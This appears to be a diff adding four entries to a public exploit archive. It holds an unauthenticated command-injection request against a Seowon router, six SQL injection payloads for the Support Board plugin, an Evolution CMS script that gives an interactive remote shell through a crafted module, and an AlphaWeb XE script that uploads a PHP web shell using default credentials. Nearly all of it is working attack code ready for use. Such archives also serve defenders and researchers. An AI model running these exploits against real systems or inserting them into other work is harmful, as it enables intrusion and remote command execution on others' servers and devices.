DB: 2021-09-16

4 changes to exploits/shellcodes

Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)
Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)
AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)

exploits/hardware/webapps/50295.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)
+# Date: 2021-09-15
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: http://www.seowonintech.co.kr
+# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
+# Version: All Version
+# Tested on: Windows 10 Enterprise x64 , Linux
+
+# [ About - Seowon 130-SLC router ] :
+
+#The SLC-130 series are all-in-one LTE CPE that delights you in handling multi-purpose environments that require data and WiFi,
+#Its sophisticated and stable operation helps you excel yourself at office and home,
+#Improve communication with excellence and ease your life.
+
+# [ Description ]:
+
+#Execute commands without authentication as admin user ,
+#To use it in all versions, we only enter the router ip & Port(if available) in the request
+#The result of the request is visible on the browser page
+
+# [ Sample RCE Request ] :
+
+POST / HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919
+Content-Length: 183
+Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte;
+cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0;
+cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0;
+cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
+Connection: keep-alive
+
+Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928

exploits/php/webapps/50294.txt

@@ -0,0 +1,66 @@
+# Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
+# Date: 29.08.2021
+# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
+# Vendor Homepage: https://board.support/
+# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
+# Version: 3.3.3
+# Tested on: Ubuntu 20.04.2 LTS
+
+----- PoC 1: Error Based SQLi (status_code) -----
+
+Request
+
+POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
+Vulnerable Parameter: status_code (POST)
+
+function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false
+
+
+----- PoC 2: Error Based SQLi (department)-----
+
+Request
+
+POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
+Vulnerable Parameter: department (POST)
+
+function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false
+
+
+----- PoC 3: Error Based SQLi (user_id) -----
+
+Request
+
+POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
+Vulnerable Parameter: user_id (POST)
+
+function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
+
+
+----- PoC 4: Time Based SQLi (conversation_id)-----
+
+Request
+
+POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
+Vulnerable Parameter: conversation_id (POST)
+
+function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
+
+
+----- PoC 5: Time Based SQLi (conversation_status_code)-----
+
+Request
+
+POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
+Vulnerable Parameter: conversation_status_code (POST)
+
+function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
+
+
+----- PoC 6: Time Based SQLi (recipient_id)-----
+
+Request
+
+POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
+Vulnerable Parameter: recipient_id (POST)
+
+function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false

exploits/php/webapps/50296.py

@@ -0,0 +1,273 @@
+# Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)
+# Date: 15-09-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://evo.im/
+# Software Link: https://github.com/evolution-cms/evolution/releases
+# Version: 3.1.6
+# Category: Webapps
+# Tested on: Linux/Windows
+
+
+# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
+#	   python3 exploit.py -h
+
+
+from bs4 import BeautifulSoup
+from time import sleep
+import requests
+import argparse
+import sys
+
+def main():
+	parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)')
+	parser.add_argument('-u', '--host', type=str, required=True)
+	parser.add_argument('-l', '--login', type=str, required=True)
+	parser.add_argument('-p', '--password', type=str, required=True)
+	args = parser.parse_args()
+	print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",
+		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
+	sleep(2)
+	exploit(args)
+
+def exploit(args):
+
+	#Check http or https
+	if args.host.startswith(('http://', 'https://')):
+		print("[?] Check Url...\n")
+		args.host = args.host
+		if args.host.endswith('/'):
+			args.host = args.host[:-1]
+		sleep(2)
+	else:
+		print("\n[?] Check Adress...\n")
+		args.host = "http://" + args.host
+		args.host = args.host
+		if args.host.endswith('/'):
+			args.host = args.host[:-1]
+		sleep(2)
+
+	# Check Host Status
+	try:
+		response = requests.get(args.host)
+		if response.status_code != 200:
+			print("[-] Address not reachable!")
+			sleep(2)
+			exit(1)
+
+	except requests.ConnectionError as exception:
+		print("[-] Address not reachable!")
+		sleep(2)
+		exit(1)
+
+
+	# Login and cookie set
+	session = requests.session()
+	url = args.host + "/manager/?a=0"
+	cookies = {
+		"mybb[lastvisit]": "1631537273",
+		"loginattempts": "1",
+		"mybb[lastactive]": "1631537588",
+		"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
+		"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
+		"KCFINDER_showname": "on",
+		"KCFINDER_showsize": "off",
+		"KCFINDER_showtime": "off",
+		"KCFINDER_order": "name",
+		"KCFINDER_orderDesc": "off",
+		"KCFINDER_view": "thumbs",
+		"KCFINDER_displaySettings": "off",
+		"evoq28fzr": "o0hd9im6q76pptjcsjeaa693os"
+	}
+
+	headers = {
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Content-Type": "application/x-www-form-urlencoded;",
+		"Accept": "*/*",
+		"Origin": args.host,
+		"Referer": args.host + "/manager/",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+
+	data = {
+		"ajax": "1",
+		"username": args.login,
+		"password": args.password,
+		"rememberme": "1"
+	}
+
+	response = session.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
+	new_cookie = response.cookies.get("evoq28fzr")
+	user_role = response.cookies.get("modx_remember_manager")
+
+	if user_role is None:
+		print("[-] Login Failed!\n")
+		print("[*]",response.text)
+		sleep(2)
+		exit(1)
+	else:
+		print("[+] Login Success!\n")
+		sleep(2)
+		print("[!] Login User", user_role,"\n")
+		sleep(2)
+
+
+	# User authorization check
+	url = args.host + "/manager/index.php"
+	cookies = {
+		"mybb[lastvisit]": "1631537273",
+		"loginattempts": "1",
+		"mybb[lastactive]": "1631537588",
+		"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
+		 "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
+		 "KCFINDER_showname": "on",
+		 "KCFINDER_showsize": "off",
+		 "KCFINDER_showtime": "off",
+		 "KCFINDER_order": "name",
+		 "KCFINDER_orderDesc": "off",
+		 "KCFINDER_view": "thumbs",
+		 "KCFINDER_displaySettings": "off",
+		 "webfxtab_modulePane": "0",
+		 "evoq28fzr": new_cookie,
+	}
+
+	headers = {
+		"Cache-Control": "max-age=0",
+		"Upgrade-Insecure-Requests": "1",
+		"Origin": args.host,
+		"Content-Type": "application/x-www-form-urlencoded",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Referer": args.host + "/manager/index.php?a=108&id=1",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+	data = {
+		"a": "109",
+		"id": "1",
+		"mode": "108",
+		"stay": "2",
+		"name": "rce",
+		"description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
+		"categoryid": "1",
+		"newcategory": '',
+		"icon": '',
+		"resourcefile": '',
+		"post": "system('whoami');",
+		"guid": "8d4669cac3afd1f59d416f11eadf3355",
+		"properties": "{}",
+		"chkallgroups": "on",
+		"save": "Submit"
+	}
+
+	response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
+	soup = BeautifulSoup(response.text, 'html.parser')
+
+	if soup.find_all("title")[0].text == "My Evolution Site (Evolution CMS Manager Login)":
+		print("[!] Unauthorized user\n\n")
+		print("User with module creation permissions is required.")
+		exit(1)
+	elif soup.find_all("p")[0].text == "You don't have enough privileges for this action!":
+		print("[!] Unauthorized user\n\n")
+		print("User with module creation permissions is required.")
+		exit(1)
+	else:
+		print ("[+] Exploit Done!\n")
+		sleep(2)
+		pass
+
+	while True:
+		cmd = input("$ ")
+
+		# Update Modules
+		url = args.host + "/manager/index.php"
+		cookies = {
+			"mybb[lastvisit]": "1631537273",
+			"loginattempts": "1",
+			"mybb[lastactive]": "1631537588",
+			"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
+			 "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
+			 "KCFINDER_showname": "on",
+			 "KCFINDER_showsize": "off",
+			 "KCFINDER_showtime": "off",
+			 "KCFINDER_order": "name",
+			 "KCFINDER_orderDesc": "off",
+			 "KCFINDER_view": "thumbs",
+			 "KCFINDER_displaySettings": "off",
+			 "webfxtab_modulePane": "0",
+			 "evoq28fzr": new_cookie,
+		}
+
+		headers = {
+			"Cache-Control": "max-age=0",
+			"Upgrade-Insecure-Requests": "1",
+			"Origin": args.host,
+			"Content-Type": "application/x-www-form-urlencoded",
+			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+			"Referer": args.host + "/manager/index.php?a=108&id=1",
+			"Accept-Encoding": "gzip, deflate",
+			"Accept-Language": "en-US,en;q=0.9",
+			"Connection": "close"
+		}
+
+		data = {
+			"a": "109",
+			"id": "1",
+			"mode": "108",
+			"stay": "2",
+			"name": "rce",
+			"description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
+			"categoryid": "1",
+			"newcategory": '',
+			"icon": '',
+			"resourcefile": '',
+			"post": "system('"+cmd+"');",
+			"guid": "8d4669cac3afd1f59d416f11eadf3355",
+			"properties": "{}",
+			"chkallgroups": "on",
+			"save": "Submit"
+		}
+
+		response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
+
+
+		# Run Modules
+		url = args.host + "/manager/index.php?id=1&a=112"
+		cookies = {
+			"mybb[lastvisit]": "1631537273",
+			"loginattempts": "1",
+			"mybb[lastactive]": "1631537588",
+			"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
+			"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
+			"KCFINDER_showname": "on",
+			"KCFINDER_showsize": "off",
+			"KCFINDER_showtime": "off",
+			"KCFINDER_order": "name",
+			"KCFINDER_orderDesc": "off",
+			"KCFINDER_view": "thumbs",
+			"KCFINDER_displaySettings": "off",
+			"webfxtab_modulePane": "0",
+			"evoq28fzr": new_cookie,
+		}
+
+		headers = {
+			"Upgrade-Insecure-Requests": "1",
+			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+			"Referer": args.host + "/manager/index.php?a=108&id=1",
+			"Accept-Encoding": "gzip, deflate",
+			"Accept-Language": "en-US,en;q=0.9",
+			"Connection": "close"
+		}
+
+		response = requests.get(url, headers=headers, cookies=cookies, timeout=5)
+		if response.text == "":
+			print(cmd + ": command not found\n")
+		else:
+			print(response.text)
+
+if __name__ == '__main__':
+	main()

exploits/php/webapps/50297.py

@@ -0,0 +1,76 @@
+# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)
+# Date: 09/09/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# Vendor website: https://www.zenitel.com/
+# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
+# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
+# Reference: https://github.com/ricardojoserf/CVE-2021-40845
+
+import requests
+import base64
+import argparse
+
+# Default credentials, change them if it is necessary
+admin_user = "admin"
+admin_pass = "alphaadmin"
+scripter_user = "scripter"
+scripter_pass = "alphascript"
+
+
+def get_args():
+	parser = argparse.ArgumentParser()
+	parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
+	parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
+	my_args = parser.parse_args()
+	return my_args
+
+
+def main():
+	args = get_args()
+	base_url = args.url
+	url_main =   base_url + "/php/index.php"
+	url_upload = base_url + "/php/script_uploads.php"
+
+	command = args.command
+	uploaded_file = "poc.php"
+	url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command
+
+	login_authorization =  "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
+	upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))
+
+	headers_login = {
+		"Authorization": login_authorization,
+		"Cache-Control": "max-age=0"
+	}
+
+	headers_upload = {
+		'Authorization': upload_authorization,
+		'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
+		'sec-ch-ua-mobile': '?0',
+		'Upgrade-Insecure-Requests': '1',
+		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
+		'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+		'Sec-Fetch-Site': 'same-origin',
+		'Sec-Fetch-Mode': 'navigate',
+		'Sec-Fetch-User': '?1',
+		'Sec-Fetch-Dest': 'iframe',
+		'Accept-Encoding': 'gzip, deflate',
+		'Accept-Language': 'en-US,en;q=0.9',
+	}
+
+	files = {
+		"userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"),
+	}
+
+	s = requests.session()
+	# Login as admin
+	s.get(url_main, headers = headers_login)
+	# Upload file
+	upload = s.post(url_upload, files=files, headers = headers_upload)
+	# Execute command
+	cmd = s.post(url_cmd)
+	print(cmd.text.replace("<pre>","").replace("</pre>",""))
+
+
+if __name__ == "__main__":
+    main()

files_exploits.csv

@@ -44412,3 +44412,7 @@ id,file,description,date,author,type,platform,port
 50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
 50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php,
 50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php,
+50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php,
+50295,exploits/hardware/webapps/50295.txt,"Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",webapps,hardware,
+50296,exploits/php/webapps/50296.py,"Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
+50297,exploits/php/webapps/50297.py,"AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ricardo Ruiz",webapps,php,